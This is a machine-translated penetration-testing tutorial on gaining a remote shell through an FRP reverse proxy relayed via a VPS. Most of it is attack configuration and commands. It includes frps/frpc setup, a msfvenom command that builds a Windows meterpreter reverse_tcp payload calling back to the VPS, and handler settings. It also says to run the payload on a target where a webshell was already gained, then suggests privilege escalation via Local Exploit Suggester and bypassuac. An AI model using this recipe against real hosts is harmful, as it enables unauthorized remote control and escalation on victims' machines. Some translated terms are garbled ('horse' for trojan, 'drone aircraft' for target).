FRP reverse proxy +msf get shell

0x00: brief introduction frp Is a reverse proxy tool . You can easily penetrate the intranet . Provide services to the Internet ,frp Support tcp agreement , http agreement , https Equal agreement type , also web Service supports routing and forwarding based on domain name .

0x01: Environmental accountability

Drone aircraft ：x.x.174.171( Hereinafter referred to as target )

kali:192.168.1.106( Hereinafter referred to as kali)

vps:x.x.193.94( Hereinafter referred to as vps)

Obtained in the target webshell

0x02: Start reverse

One 、 stay vps Downloading in frp And edit frps.ini

vim frps.ini

#frp Connection port between server and client ,frps and frpc It has to be consistent 
bind_port = 7000

 start-up frps：./frps -c ./frps.ini

Two 、 stay kali Downloading in frp And edit frpc.ini

vim frpc.ini

[common]
server_addr = x.x.193.94
server_port = 7000        #frpc Work port , Must match the above frps bring into correspondence with 

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555          # Forward to this machine 5555
remote_port = 6000         # The service side with 6000 Port forward to local 

  start-up frpc：./frpc -c ./frpc.ini

here frp The reverse proxy is finished , Let's start with MSF Horse making and setting monitoring .

3、 ... and 、MSF Make a horse

msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.193.94 lport=6000 -f exe x>i.exe

Notice here :

lport The port of is you frpc.ini Inside remote_port = 6000 port 

Four 、 Set listening 、 perform msf Horse

Notice here :

set lhost 127.0.0.1   # Set listening ip, It has to be with frpc Medium local_ip  Agreement 
set lport 5555        # Set listening port , And frpc Medium local_port Agreement 

Go to the target plane to execute i.exe

Observe vps Upper frp

Observe local kali

Obtained shell

tips: Built-in module Local Exploit Suggester. This module can help us identify which vulnerabilities in the system can be exploited , And provide us with the most suitable exp, Through this exp We can further raise our rights .

My most commonly used bypassuac modular

exploit/windows/local/bypassuac